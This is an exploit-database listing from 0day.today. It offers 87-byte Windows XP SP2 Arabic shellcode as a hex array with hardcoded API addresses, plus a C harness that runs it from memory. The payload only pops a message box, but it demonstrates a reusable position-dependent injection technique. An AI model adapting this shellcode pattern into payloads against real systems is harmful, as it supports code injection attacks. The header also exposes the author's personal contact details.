[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

win32/xp sp2 ARABIC (ar) Message Box Shellcode (87 bytes)

Author
TrOoN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17455
Category
shellcode
Date add
28-01-2012
Platform
win32
# Title :  Windows XP SP2 ARABIC ( ar) Message Box Shellcode (87 bytes)
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr  |
# Facebook : www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform : WinDows sp2 arabiC
# Type :     shell COde | etc...
# WARNING : Windows XP SP2 ARABIC    pleas test in windows Xp sp2 arabic
# donwload : http://www.microsoft.com/download/en/details.aspx?id=28

###




#include <stdio.h>

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x21\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0";    // 0x7c81cb12 ; ExitProcess(0)

int main(int argc, char **argv)
{
   int (*func)();
   func = (int (*)()) shellcode;
   printf("Shellcode Length is : %%d",strlen(shellcode));
   (int)(*func)();
   





                  ######################################### TrOon #######################################
                  
                  thankX to : 1337day | bRescO-dZ (cousin) | security-ray | Turk hack | exploit-tuRK | 78/40 | team_mosta | hacker_fire |
                  
                  elit_Tr0Jen | hacker_1420 | Algérien de la Garde Républicaine all 



#  0day.today [2024-12-24]  #